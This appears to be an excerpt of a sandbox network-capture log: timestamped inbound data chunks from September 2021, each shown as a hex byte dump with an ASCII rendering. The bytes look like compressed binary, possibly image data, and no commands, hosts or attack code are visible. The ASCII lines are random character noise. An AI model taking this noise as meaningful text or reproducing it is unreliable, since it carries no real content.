                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC136INData Raw: c0 ff 00 e5 41 cc 9e da f4 3d 6f cf f4 87 a1 32 e1 c5 92 63 70 bf 76 a9 1b 1f db 27 6e 33 19 3f 24 80 e1 8d 1f 04 f0 7e 7a c5 ff 00 a8 a7 1c 6a 0e e1 29 14 a5 db 2a f9 da 3e 83 fe 96 e1 c8 48 a5 c9 21 85 6c ed ee dc f4 11 dc 1f a5 d8 6b f6 10 c6 12 c2 46 2a 59 48 58 9c 9e 2a 30 39 2c 84 9a 63 77 c8 ab 1d 7c cb 89 98 f3 05 e8 ee e6 fc fe 3f 4d 1f 5e e0 64 11 c3 d8 d1 9e ee c2 bc f9 ff 00 51 62 f4 ad 2e 1c a8 63 46 5d b1 a2 16 77 31 f2 0d 9a ec b3 86 a6 be 69 55 8b 03 7c 59 3d 12 51 04 a4 b5 6d 6c 9a 9f b8 0c e0 c4 f4 ae d6 ef 4e 71 0b a9 fa 49 67 96 59 25 1d a8 5b fe 69 ef b8 df 40 88 c7 6b dc dc 8b 32 16 6a a3 5d 58 89 98 40 a5 eb ed d0 53 b1 68 41 40 12 5c 0c da 9d 36 d3 7e 50 17 ae fa 3e 29 f4 bc 95 d9 2c 18 85 d5 7b 71 a8 53 90 18 88 e3 20 fe e3 04 63
                                                                                                                                                                                                                                  Data Ascii: A=o2cpv'n3?$~zj)*>H!lkF*YHX*09,cw|?M^dQb.cF]w1iU|Y=QmlNqIgY%[i@k2j]X@ShA@\6~P>),{qS c
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC137INData Raw: aa d5 73 4a ca 41 05 80 a0 62 d4 b1 b0 e5 9e 62 b0 2d ac c8 92 c6 aa e2 29 1d 65 12 48 c8 2d d0 a6 e0 4e f7 3f b4 f1 c9 b3 67 f9 ea b2 6c d0 f8 5d da 84 97 26 bd f3 d6 2d b8 69 6a 24 28 05 00 0d 81 60 68 f5 b6 fd 35 cd 57 ac b6 3c f8 ed 34 51 90 4b 94 01 25 20 14 dd 5b 59 48 b2 54 92 78 e0 dd fe 3a 59 60 61 a3 5e e3 f2 3b ca 2d 43 a4 29 de 88 34 27 3a 54 3b b1 15 36 cc c4 26 9d 00 85 d8 07 ad d2 6f d9 09 ba 0e b1 95 f3 e4 d8 3b b9 a1 64 d7 4e 70 8a c2 93 4b bf bc 51 fd 52 a8 42 85 41 39 b5 5a e2 af ad 28 7a c4 ce 56 9b 2c 39 f0 e5 c4 81 cc 30 7e ae eb 05 1a 43 6c c0 d6 da e2 c9 f3 c7 e3 c3 04 95 2a 99 33 ed 43 9b 53 bb 67 46 70 81 5a 69 90 a9 6c 99 ff 00 35 2f 56 3e c1 d4 1f 2b 1a 38 47 b7 1e 48 82 64 6c 21 81 65 a6 6d de 42 83 54 41 a6 fe de 3a 94 a4 63
                                                                                                                                                                                                                                  Data Ascii: sJAbb-)eH-N?gl]&-ij$(`h5W<4QK% [YHTx:Y`a^;-C)4':T;6&o;dNpKQRBA9Z(zV,90~Cl*3CSgFpZil5/V>+8GHdl!emBTA:c
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC138INData Raw: b4 23 c3 38 49 11 b8 3c b9 00 33 70 50 50 02 ba d2 70 93 12 4a 41 24 33 67 5a fa 77 d6 33 9c 7c 90 92 c0 da b4 36 e7 be 7d 63 8f ff 00 5a b4 c9 74 ff 00 53 fa b7 2e 48 d6 34 ff 00 0c b8 c9 36 aa e7 20 97 5b b0 44 8a 10 ae da fe 6c 0e b7 7f 4d 25 41 22 84 10 ce 4d 45 ee 2a e7 3c a3 e7 bf 59 29 49 5e 24 82 58 d4 8c aa 74 ce b6 b1 ca 2b 56 6b 4f 97 e9 08 c6 c5 10 e3 ea 92 cc dc da c8 f0 20 68 14 90 39 05 cf ed be 5f f3 c5 df 21 a5 31 a0 ad 72 76 d8 54 c6 26 72 7e ec b5 10 18 e3 c2 1a ed 46 b5 ee 73 b3 69 07 5f 4c 63 81 5d 70 72 fe e6 04 ce 8a 69 62 74 66 ed 43 32 62 65 4b 0e e5 fc 99 40 2c 17 95 20 1e 3a 53 8d 98 99 8b 64 b6 e5 34 73 ea 3b 6c a1 8e 12 57 da 77 35 b1 ab 07 d1 bb f4 87 9e a5 ab c3 8f ad fa 36 5c 77 49 21 c6 d1 35 2c 71 92 aa df 70 c2 54 87 32
                                                                                                                                                                                                                                  Data Ascii: #8I<3pPPpJA$3gZw3|6}cZtS.H46 [DlM%A"ME*<Y)I^$Xt+VkO h9_!1rvT&r~Fsi_Lc]pribtfC2beK@, :Sd4s;lWw56\wI!5,qpT2
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC140INData Raw: 4b d9 ab 4a 1f 63 fd c5 5f d4 f2 f2 4e 07 a9 33 72 09 8a 7d 5b 51 d5 35 69 e4 75 f7 26 36 1e e8 71 d0 35 9a 01 00 61 b8 7c 9a be 89 89 4a 43 2a dd 07 2a fa 7e 62 52 41 0a 53 dc 6b af 66 39 4b aa e7 9c cd 57 5a c8 69 5a 48 73 73 f2 db 69 3b 91 94 c9 b5 4f ed 3b 68 a8 24 8f cf 9a e9 45 37 f8 ee f9 fb bc 59 24 e1 2f 93 6d 68 04 c4 8e 2c 3d 0d 72 77 77 24 c4 d5 b2 f2 16 8d 9b 79 28 51 36 7d 9e 48 f9 20 0e 83 30 ac 02 01 a1 70 45 2f 95 72 19 1e 90 d4 b1 8b c3 fe 24 bb 64 e7 3d 47 62 08 3d 49 1b 43 89 e8 e9 1e 4f d6 8a 29 e6 3e ff 00 79 69 72 fb 80 10 a6 cd c2 c8 42 11 7c 96 f1 d2 21 47 11 48 bb 5c e7 6d a1 e5 27 fe 21 87 f9 5a bb 12 dd ed ca 06 fd 43 8e f3 e6 41 1c 42 11 ff 00 07 24 91 8b 1f ab 91 93 de 99 e3 0a 39 dc 40 2c 0d f1 e4 0f c3 92 82 81 48 51 07 17
                                                                                                                                                                                                                                  Data Ascii: KJc_N3r}[Q5iu&6q5a|JC**~bRASkf9KWZiZHssi;O;h$E7Y$/mh,=rww$y(Q6}H 0pE/r$d=Gb=ICO)>yirB|!GH\m'!ZCAB$9@,HQ
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC141INData Raw: 69 4d 12 29 38 93 89 25 92 6e 18 1a 6b 5a ef fd 18 51 53 90 95 29 c0 24 b6 ad 96 9a 3f ad 6b 1a 39 9a 74 30 44 d2 c8 b0 f7 a3 2a 7b d0 81 0b b0 74 b2 25 24 9e ee e3 60 01 ee 07 f1 d0 f1 a0 10 94 e9 5a e7 ad 6b f0 dc e9 5d c4 92 48 60 40 dc 92 d5 7e 97 fe 88 8a b7 f5 3b 2e 49 1e 5c 7e 58 c6 d2 49 1b ee a2 52 10 56 80 e2 c9 1e 45 58 af e0 9e 9b 94 ea 7c 55 0d cb 3f ce 99 de f5 a9 98 92 0d 58 ed 98 cf 91 ca 13 da 14 07 ba b0 42 80 b4 c6 36 c9 62 3d a5 2f 77 6d c9 f7 1f 71 b2 2e aa c7 8e 3a 23 04 24 d1 c6 6e 6a de be 8d 48 5d 32 d9 40 01 47 d4 03 a8 1e 7f a8 b5 9e 82 56 44 c7 4d d0 2c 33 49 16 34 88 11 56 42 91 59 75 8e 40 be c4 2a 05 6e 36 cd 43 c7 49 62 51 5a 8a 68 2b 4f 7d c0 ce e7 68 d3 f0 88 50 96 19 9d 9e ad 4c c3 bd 1d ba 64 f1 73 7d 22 04 8a e3 08 48
                                                                                                                                                                                                                                  Data Ascii: iM)8%nkZQS)$?k9t0D*{t%$`Zk]H`@~;.I\~XIRVEX|U?XB6b=/wmq.:#$njH]2@GVDM,3I4VBYu@*n6CIbQZh+O}hPLds}"H
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC142INData Raw: 04 0e 0f ed b3 e3 e7 ff 00 3f 8e 94 4a cb 92 d9 16 e6 de a7 f1 68 28 48 53 82 37 19 31 e7 7f 3f 58 ca 62 8d bf 4b 9a e2 f6 f2 0b 1a a0 4f 81 cd 5f 42 c0 56 5f 30 5f cf cf 48 90 43 06 19 77 bf 46 fc 36 99 c7 11 b0 e0 34 6a c4 b0 f8 ba 3e 4f fb 7f a7 8a ae a3 f6 c8 2f e2 7e 9f 88 99 24 8a d4 8b 30 cc 7e 0f 48 19 d7 a4 48 f1 4c 41 58 47 22 73 da 42 e1 7b 6f b8 5f 24 fb 47 ba b7 00 7e 7e 7a 9b 30 49 ce be 8c d9 77 ed 19 60 4c 3e 2f 3a e4 f4 d3 bc e2 be fa cb 1e 29 57 29 66 0d ef 86 40 ae db 77 6e 60 76 90 ab ed 46 65 ab 04 91 fc f8 e9 c4 20 12 92 ed 4f 56 ee 90 60 19 49 15 a0 f9 e7 5e b5 bd 1a 91 ce ff 00 aa 3a 74 d0 66 61 5e 3a aa c4 99 ab 2a 2a 82 e6 23 1b 34 6c 49 e0 5e cd ed 5f 34 7c f5 6b c3 b0 2e aa d1 c5 e9 cd 99 f2 a4 57 71 b2 90 42 94 07 8a b9 e5 95
                                                                                                                                                                                                                                  Data Ascii: ?Jh(HS71?XbKO_BV_0_HCwF64j>O/~$0~HHLAXG"sB{o_$G~~z0Iw`L>/:)W)f@wn`vFe OV`I^:tfa^:**#4lI^_4|k.WqB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC143INData Raw: 79 1f 02 bc 9b ff 00 4e 88 08 23 c2 30 ed a1 d6 be 9b 52 04 52 af ff 00 b8 a3 be 9d 32 ee f1 f3 95 b5 b2 ca 0d 82 41 e4 8e 09 35 44 d7 e6 87 cd f1 d4 26 1c 29 76 7d cc 39 20 80 90 90 6c 1d f3 df 3c f2 d6 3d 2e f1 44 1a be 39 3c 6d 6f e0 fc 81 f9 3e 4f 42 49 24 39 6b fc 41 56 84 5c 13 99 3f 9b 37 ac 7b 9e 78 e0 8c b3 b1 77 75 a5 51 e0 35 9a 2e 79 14 3c df cf 83 d4 e8 2e 1c 17 d4 6c da 7c d6 17 a8 2c 1c b9 25 cd c6 9c b9 76 06 75 f9 d7 1b 40 91 15 0b e4 e4 39 85 1a bd d2 4b 94 d6 08 03 e6 89 1b bf 0a 3f b7 50 c0 9d 1b 95 07 e3 a7 98 b4 19 47 c2 92 35 07 a7 6f ed 0b cd 47 66 0b 43 a6 c3 1b 83 06 9a f9 19 15 7b 55 5e 22 d1 a6 e0 4e d6 34 cc 49 f8 f1 f8 e9 6c 20 ec 7d db bc b5 89 a2 69 3e 1c 23 47 7a 0a df 62 5a ef 9c 55 7f aa 9a eb 69 9f 4d b5 7c b1 12 09 f3
                                                                                                                                                                                                                                  Data Ascii: yN#0RR2A5D&)v}9 l<=.D9<mo>OBI$9kAV\?7{xwuQ5.y<.l|,%vu@9K?PG5oGfC{U^"N4Il }i>#GzbZUiM|
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC145INData Raw: 9b b1 66 ad 1a b5 e7 a4 34 b4 13 87 c4 48 76 6a 7f 8d 6c 28 2b d4 be f5 3b c6 f4 f0 2c a5 a5 ca c8 9d c0 88 43 db 42 c2 20 40 56 43 22 86 79 4b 07 0c 68 26 d0 a1 7c 9e a7 2d 68 07 22 ec 00 2d 9e bd f9 18 22 50 30 2a ae 00 34 3b d6 96 e5 6e b0 71 8b a3 07 4e d4 da 6c b3 dc 63 b4 cc ef 86 63 74 da 6e 34 80 94 d8 42 2b 32 49 64 b8 27 70 e3 a6 25 29 a6 0f 08 09 d8 df 5a 65 47 f4 d2 a3 5a 88 0c 00 ab 78 aa e2 d4 7e f3 8d c8 74 99 31 72 1d a6 59 25 83 71 91 99 e1 c7 b1 1a ec 62 d9 0f 12 17 2a aa cc b1 ca ac 58 ba a8 65 17 7d 75 6b 98 16 ce 14 9c 44 d6 8c 09 a7 90 d7 2f 58 3c b5 02 c5 88 a5 a9 41 57 6d 4f 96 f6 89 87 8c 09 22 30 c0 9d b7 90 18 da 50 40 11 d1 57 65 96 83 fe a0 60 36 31 a4 15 e4 0b 23 5c c2 82 40 3a 53 21 4f df cf 35 95 2f 19 72 1a ba dc 7e 87 2c
                                                                                                                                                                                                                                  Data Ascii: f4Hvjl(+;,CB @VC"yKh&|-h"-"P0*4;nqNlcctn4B+2Id'p%)ZeGZx~t1rY%qb*Xe}ukD/X<AWmO"0P@We`61#\@:S!O5/r~,
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC146INData Raw: 27 1d 94 32 14 cb 33 ce c7 ca 24 62 d1 f5 35 7b 7c 79 1b dc ca ad 14 72 6f b0 3f 7b 00 bd b2 09 ba 61 60 8e 3c 81 d0 94 0a 01 15 4e 65 b7 ef a5 2c 23 80 85 28 2d 25 41 24 54 35 f3 f5 b5 2d ad 29 39 0e 11 89 09 9b d9 b4 a8 31 c8 d2 21 1f 90 37 02 08 fc f2 3c f3 d2 85 4c 4b f8 9d a8 59 85 2e 1b 9e 9f b7 28 a1 2d 8b 31 2e ce 72 a6 79 b6 b5 36 da 4d 1b 19 e3 8e 1e de 32 31 34 ad 6a dc 8e 6e f8 63 75 e7 cf f1 d5 77 11 8d 44 ab 00 48 d9 fc 98 d7 3e 5e 90 64 81 60 05 85 6b 51 43 56 ef ac 66 4d 35 15 99 99 11 4b b0 2b 38 16 ca c5 7f 69 21 af 69 ff 00 2f 07 a8 21 40 8c 2a 45 2c ec 5f 4e c7 96 91 20 0a 41 2c 0d 35 b7 2e 59 8b 73 8c 12 76 31 1d ed 37 48 50 b5 8d a1 bf 75 06 5b 1b ac 57 35 74 2c f8 17 d4 54 42 54 42 6d 4d 08 e6 1b 23 fb b9 89 25 2a 58 f0 95 13 9f 7d
                                                                                                                                                                                                                                  Data Ascii: '23$b5{|yro?{a`<Ne,#(-%A$T5-)91!7<LKY.(-1.ry6M214jncuwDH>^d`kQCVfM5K+8i!i/!@*E,_N A,5.Ysv17HPu[W5t,TBTBmM#%*X}
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC147INData Raw: e1 8a 7b df 75 0b 11 39 00 63 a4 52 4b 2e d0 e6 fd ac 8a f1 86 00 28 01 79 f3 d0 14 a2 a1 86 c3 32 0f e7 f6 f0 40 40 53 e1 49 da bd f2 f6 82 6d 52 23 ea 3d 43 29 b1 2e 00 9f 6d 2a d9 52 1e 39 31 d4 5a 93 e4 6e e2 eb 9a 06 fa 94 b4 2d 20 80 07 3f 3d 23 8b f1 ed 6d f2 ec c7 f4 25 8b 92 f7 b0 29 92 bf 71 3b 7d 97 fc 1a ba e3 c7 fe 5d 6a 30 b2 2a 2b fb f4 8c 22 52 52 41 7b 68 f1 22 a4 d8 e0 7e 4d 70 c4 13 c5 7f eb f1 e7 ae 25 44 38 c8 db 9f e2 db c7 54 82 6a 90 7a 66 5e ff 00 9a c6 f0 98 00 05 86 14 c0 12 68 fc 58 6f 16 7f fd 3e 7a 32 4a 80 df 36 cf ce 23 f6 dd b1 10 5e ed 77 eb de 51 f2 d0 2a 83 6a bc ee 07 f6 ff 00 60 4d d8 fc fe 3f ef d7 a6 a9 d1 d2 ba bd 2d dd e2 28 96 a4 b9 74 d2 d7 de f4 ec b7 4d 79 72 e3 50 ca 10 59 2a 91 b2 8b 05 e9 8f 35 c2 80 a0 d9
                                                                                                                                                                                                                                  Data Ascii: {u9cRK.(y2@@SImR#=C).m*R91Zn- ?=#m%)q;}]j0*+"RRA{h"~Mp%D8Tjzf^hXo>z2J6#^wQ*j`M?-(tMyrPY*5
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC148INData Raw: 37 b6 8f c1 15 d3 35 28 96 90 fc f5 19 ed 5e f5 8e cb 94 e0 0c 21 ee 5c 10 7e 2a 2d 7b 35 ab 1b 71 fa 7f ed f1 a5 72 8d 23 e4 44 61 0e 8c a8 5d d9 57 ce db 6d a5 3c b0 65 24 83 f2 3a 88 98 08 72 e4 eb 7a 65 a4 45 48 52 14 c0 24 38 14 ea 6d 4f 5f 78 c1 8d e9 84 33 33 47 8a e4 ac aa 87 dc 84 14 11 83 41 de ca c8 b4 08 55 db 7f 2c 4f 9e 02 0a 83 50 9b bd ad b5 fb 2d a1 82 7c 35 fe 59 1d 0e 55 db ba 41 36 2e 96 63 91 99 23 24 c9 90 c5 64 1e f2 50 a5 bc 8d 21 23 fe 5b 85 01 4d aa f1 43 81 d3 0a b8 04 b0 cd a2 09 06 c6 86 ad 6b 3d 7d 3a 12 f7 04 c1 04 3a 60 19 18 03 bb 1a bb 33 46 65 90 2c 93 a2 b0 67 ee 05 a0 63 4a e1 dc 30 1c 8d bc f5 16 40 a8 2a 70 e4 5c d7 2c bd 2d 13 48 60 d7 7f c7 58 21 82 39 b1 50 46 c7 b8 02 db 49 20 d9 72 45 41 55 18 29 22 1b 3c 2e d2
                                                                                                                                                                                                                                  Data Ascii: 75(^!\~*-{5qr#Da]Wm<e$:rzeEHR$8mO_x33GAU,OP-|5YUA6.c#$dP!#[MCk=}::`3Fe,gcJ0@*p\,-H`X!9PFI rEAU)"<.
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC150INData Raw: af ed f9 34 1a 74 b4 04 92 06 cd ad 6e 5a e6 d6 b6 57 8d f6 f4 de 9e ee 3b f8 aa 23 63 4c a9 3b 2c 8f ed 2c 1a bf 69 04 9d fe 02 ed 23 db 7c 8e 25 32 95 97 a7 ef 2d 2f 0a 95 4c 4a 4f 88 7a d3 43 a5 3b 78 97 6f 4f e9 a2 05 8b 0d dd 5d 86 d7 12 bd a0 50 01 e1 ff 00 cd 7f e5 42 a0 73 c1 07 c1 4a 01 4e 14 37 84 30 27 33 97 cd 7c ce a8 85 4c 2b 24 84 90 0f 99 36 0f c9 f5 c9 e3 1c 3e 9f 55 8d 8a 32 a3 a7 25 a2 8a 61 1c 6a b5 46 4d 85 80 26 81 27 6d 73 e7 a4 17 c3 e3 27 1b 03 5b 8a 7e 6b 51 48 b1 47 12 0a 46 24 da 96 cb cc 73 70 2b 6e 7a cd 83 00 98 f7 64 c5 98 1a 36 02 3a 92 7e 0a b0 2e 2b e6 c7 55 b3 24 a5 2a c3 76 ea 3a 13 df 3a c3 69 76 04 3b 2a a4 79 7f 77 f3 6a c2 e7 69 d1 33 b2 2e 3c 32 c7 20 60 c1 14 71 55 5b 02 80 41 fc 1e 05 f8 e7 9e 80 50 09 c0 59 b9
                                                                                                                                                                                                                                  Data Ascii: 4tnZW;#cL;,,i#|%2-/LJOzC;xoO]PBsJN70'3|L+$6>U2%ajFM&'ms'[~kQHGF$sp+nzd6:~.+U$*v::iv;*ywji3.<2 `qU[APY
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC151INData Raw: 77 03 37 70 47 28 dc 44 6c 69 89 4b b5 6e 68 16 03 e7 aa f9 a5 a6 63 22 84 b5 98 55 ad 5d 5e a3 28 7d 1f f3 02 03 a5 aa 5f 6d c3 fe 1f 94 33 34 78 a3 d4 72 b4 bf b2 5e d6 a0 92 88 9f 15 5d 69 91 cc 60 cb 1a 0a 2d 18 23 de 1a dd 77 03 e3 a8 4d 20 4b 51 bf 87 df 20 f7 ed a3 a8 51 0a 09 c9 d8 e9 66 b5 b9 43 1f 27 00 c7 06 54 19 22 58 a7 38 d2 bc 62 50 0b 32 b3 c8 94 a0 00 5a 9c 36 ce 18 af 26 c1 e9 10 71 16 14 36 ae f0 d9 49 01 dc 35 35 cf a4 68 e9 72 65 61 f6 ea 45 50 98 91 c0 ee c4 fb d9 76 b0 b0 6c 92 06 ea 37 e3 e0 5f 45 4c d5 24 b8 d1 a9 4f cc 71 b2 15 e5 58 fe 8b f1 63 58 d8 1d fb 4f ce e5 36 4d 8f 04 f9 e3 c7 f1 fc d7 5a 62 ac 45 93 51 b7 b9 ea 3b ac 61 09 b8 07 c5 a7 7d 98 96 4d a4 90 0f b9 7d c0 93 4b e7 91 c7 c7 1f fd 38 ea 31 d1 39 48 18 4a 02 9e
                                                                                                                                                                                                                                  Data Ascii: w7pG(DliKnhc"U]^(}_m34xr^]i`-#wM KQ QfC'T"X8bP2Z6&q6I55hreaEPvl7_EL$OqXcXO6MZbEQ;a}M}K819HJ
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC152INData Raw: 48 e5 12 77 21 8a a6 f1 c8 55 b6 21 2b f1 c7 80 44 a1 85 f1 06 ef 68 65 20 cc a6 0a d5 85 03 37 a5 ba f3 bc 17 60 e2 c7 21 44 c7 76 45 2b 09 66 e4 27 75 38 65 46 fd d2 6f 04 5e ed b4 05 90 08 eb 82 b7 0c f7 7a c4 cc a6 3e 34 33 d9 ea 74 bf eb d2 f3 b3 e3 ce f2 26 38 60 1e d9 7b a5 98 29 21 0d 83 b8 01 fd 82 d6 ea 3f c9 e8 13 65 02 41 41 c5 9b 64 29 6a f3 7d 1c ef 13 95 c3 85 62 53 32 4d 47 5d d9 f2 b7 ac 6e e3 e2 6e c6 8d 76 ba c6 00 49 0a 05 0e a6 11 ee 64 8f f6 9b 20 ed 20 f8 f3 cf 5d 09 20 00 d9 0b 77 fb 81 ce e1 40 2e cf fb 7f 6a d3 3b d6 d1 37 06 9f 00 82 46 95 98 23 b4 7b 4e d7 12 10 5f db fa 60 95 56 da 15 18 d8 24 fe 39 eb c1 c2 80 f3 d8 7e f5 16 15 80 2a 41 38 4e 13 85 db 2f 2b 5a 97 2f f9 df 4d 0d f1 a5 85 d1 59 44 a0 04 de 12 55 f6 29 67 52 80
                                                                                                                                                                                                                                  Data Ascii: Hw!U!+Dhe 7`!DvE+f'u8eFo^z>43t&8`{)!?eAAd)j}bS2MG]nnvId ] w@.j;7F#{N_`V$9~*A8N/+Z/MYDU)gR
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC154INData Raw: 8c cd 2f d7 f7 b8 87 e4 a8 a0 62 03 c5 63 6f cb 7f 76 88 57 d0 42 02 91 c7 31 19 11 17 8c 44 e4 22 23 21 1d f9 64 db 22 91 60 92 a1 41 00 d8 ab eb 93 c1 52 5c 31 60 74 17 ec 37 c0 86 d1 34 12 90 a1 4c 42 a6 ac 29 a5 7d 22 1a 6c 23 89 1c 28 c8 5a 1d 9b 97 64 45 77 c4 2f 73 19 4d 21 dc c6 cb 29 e5 4f b4 5f 22 3f 71 48 96 1e 9c f2 ef 3f 88 60 4b 54 c5 61 6f 0e b9 3f bf 7b c6 32 a1 23 8d 55 a7 fd 45 2d 19 67 28 cd 17 ed 3d a2 eb bb d9 e2 c9 24 8f f6 e9 7f bc 11 5c 59 ef 7f 2f 91 95 e0 47 85 c4 58 3b 1e f3 f3 77 8f b0 2b 47 36 c7 c5 97 de a7 70 69 58 35 2a d8 6e e8 16 29 79 5e 68 b8 db f2 3a ea b8 cf b6 01 49 bd ee ef dd ef e9 1d 1f 4e 18 89 04 e8 2c 41 df b0 6a f4 8d bf f1 01 22 21 86 57 8e 68 f7 c6 9b 5c 23 49 19 3e de ed f0 ff 00 ce fe 47 07 cf 1d 75 5c 5a
                                                                                                                                                                                                                                  Data Ascii: /bcovWB1D"#!d"`AR\1`t74LB)}"l#(ZdEw/sM!)O_"?qH?`KTao?{2#UE-g(=$\Y/GX;w+G6piX5*n)y^h:IN,Aj"!Wh\#I>Gu\Z
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC155INData Raw: d9 f6 5a 31 e2 02 f8 8b 8e 74 ee fc b5 1c 30 f6 63 9f 4a cb 81 a4 78 9b 6e 20 76 22 4c 7c 88 e4 65 52 6c 13 b6 42 2a 87 16 47 1c f5 d0 a0 b5 06 35 a5 86 5a d7 f7 f0 7d 80 a0 e1 25 cd 4d 4f 90 ca 82 9d d2 31 e9 ae 60 cd ca c5 9e 27 59 23 58 32 42 89 0e d7 d9 31 28 40 e4 37 b2 59 23 ae 28 d5 d7 c1 16 1c 6b 70 72 a1 de 96 ef 38 8c b7 46 20 a7 72 ec 1f 72 f9 e4 e3 7d f3 86 67 a7 a7 8e 1c 96 de 48 8c 82 b2 d8 1b 97 72 95 12 31 f3 c2 ba 96 03 cd 51 3d 55 f1 03 08 7d da dc db 3c e8 d1 6b c3 96 00 5d 57 6a 3e 1a f4 cf 95 e0 b6 08 4e 96 f8 59 d0 e4 4f 1e 66 3c f0 e5 24 b4 c3 6c ab 20 28 ca 6c 86 84 58 25 47 ee 46 00 fe 7a 5d 00 a8 28 2a 81 b2 e9 be c6 18 9a 02 58 8b 91 96 6f 93 be f7 df 48 b0 1f e2 99 1a bc f9 39 d2 c3 dc 95 20 dd 8d 1e 31 09 19 5d a9 24 cb 13 b0
                                                                                                                                                                                                                                  Data Ascii: Z1t0cJxn v"L|eRlB*G5Z}%MO1`'Y#X2B1(@7Y#(kpr8F rr}gHr1Q=U}<k]Wj>NYOf<$l (lX%GFz](*XoH9 1]$
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC156INData Raw: 34 a6 58 b2 63 de 36 90 92 6e 0a 54 95 24 f2 a2 b7 30 af 78 15 d2 93 b0 ca 46 a0 90 29 97 4a e9 91 e9 16 22 59 5b 00 40 00 93 53 72 1d 8e 7c a8 f0 d9 d0 35 0c 69 e6 54 93 29 9e 55 08 5b 75 44 4e d0 08 04 2f 21 86 db 42 b4 5c 79 e4 72 b4 d5 a1 78 4e 1a 82 36 cc 30 a0 ef 94 58 4a 42 d2 9b 93 47 64 8d b4 1d 74 7e 42 1d 7a 6e a4 ad 24 4d 3b 43 ba 22 ae b1 ef da db 5c 80 1c a1 e0 50 fd c0 5b 12 49 24 12 7a 04 df 13 92 39 ec 3b 6f 78 72 52 48 18 db 30 2b 7a ec cf ef 97 28 66 63 e6 44 e2 39 31 65 89 25 1b 58 36 c0 47 b9 f9 42 b5 ca 90 2a cd 1f e4 f4 16 d0 7c 6a 3e 49 b3 18 66 5a 14 ee bb 68 7c d8 82 fb 7f 71 3a 65 8d a3 ee ca dd b9 04 a1 8a 2d 03 ed f9 d9 64 d0 16 54 d8 a3 f9 1d 7b db b3 df bc 18 06 27 21 46 0c c2 de 5d f2 89 9c 4c 97 80 24 cb 0a 9e e4 8c 2a 42
                                                                                                                                                                                                                                  Data Ascii: 4Xc6nT$0xF)J"Y[@Sr|5iT)U[uDN/!B\yrxN60XJBGdt~Bzn$M;C"\P[I$z9;oxrRH0+z(fcD91e%X6GB*|j>IfZh|q:e-dT{'!F]L$*B
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC157INData Raw: 38 98 f3 66 d3 d4 7c 59 e2 a3 89 12 d7 28 cb 48 c3 32 e5 4d 71 a3 96 7b 3f 28 63 47 22 a6 d9 a0 99 96 43 12 a0 90 b8 09 1a 56 da 2a 0b 1a 02 d4 01 c6 ee 4f e7 ab 4c 25 a8 58 0c d8 1e 5d 88 a2 4c b4 ba 92 aa a8 7e f9 8f ce 80 d6 3e 43 92 55 17 1e d1 9e 42 5d 98 a9 32 13 47 cb 06 b9 51 45 b7 6e ab 77 b8 0b 1d 43 14 c0 5b 11 d6 96 b7 7d 77 86 3e d4 9c 2e da 03 4e a7 95 29 9d bc e3 e4 ca 96 b7 63 49 01 8c b1 56 72 4c 44 c2 c6 8b c8 a1 94 b9 2c 02 a8 93 f2 bd 78 2a 63 87 2a 62 6b 57 a7 43 41 e8 79 56 0a 99 12 b0 95 25 35 6f 09 6f 22 39 fb be d1 ad 9a a5 e0 38 d3 2f 71 a3 4f f2 31 e1 2c 10 7d c2 f7 51 23 fe 6a 28 06 f9 34 3a 82 97 f7 0e 0a b0 a7 41 4a d7 7d 3a d1 e0 89 f0 80 2b 47 e4 e5 af e5 6d 37 11 a3 34 31 a2 ac a5 61 12 47 0a 22 a2 c2 ce 13 6b 29 8d 24 28
                                                                                                                                                                                                                                  Data Ascii: 8f|Y(H2Mq{?(cG"CV*OL%X]L~>CUB]2GQEnwC[}w>.N)cIVrLD,x*c*bkWCAyV%5oo"98/qO1,}Q#j(4:AJ}:+Gm741aG"k)$(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC159INData Raw: 67 c0 05 1c 03 4e af 6e c4 4c 0f f3 67 24 3b 74 ca 3c 6a 73 89 97 17 3c fe 9b 62 4d 16 26 5b a2 f0 fd b2 3b 52 9e 05 48 e0 30 91 a8 12 c0 5f 5c 0a 4a 52 50 03 8c f6 6d bb 1e 42 21 35 58 56 08 dd a8 e2 e6 9b 0b 5b 21 06 78 0f 1a 65 c3 93 14 8e ed 94 8d db 74 24 82 c8 55 8a 9e 3f cc 87 77 c1 fc 1e 97 98 90 a0 76 a0 0a 35 19 52 b4 ad bf b3 0d 4a 5b e1 c2 e0 a8 07 d3 e7 36 8f 9e a9 d3 99 1b 2f 23 7a 2e 52 08 b2 23 9c ee 65 28 e0 36 fd c5 42 b6 d6 03 72 9b 20 82 2c 0e 83 c2 97 51 d8 91 97 77 7f ec c1 a6 4a 21 38 89 7d c5 79 31 cf 96 79 33 40 86 23 3c d9 50 cd 21 11 b4 f8 d2 09 0a af bb bc e4 05 28 a3 fc 8d 3a 01 44 d2 ef 53 fd dd 55 8f 28 49 35 98 79 01 4d f7 de a3 a1 de 0f 74 47 41 97 14 93 51 7c 9d ca d1 0a b8 c0 15 2a 3b 35 ed 68 cd 35 0f 83 e7 93 d2 13 93
                                                                                                                                                                                                                                  Data Ascii: gNnLg$;t<js<bM&[;RH0_\JRPmB!5XV[!xet$U?wv5RJ[6/#z.R#e(6Br ,QwJ!8}y1y3@#<P!(:DSU(I5yMtGAQ|*;5h5
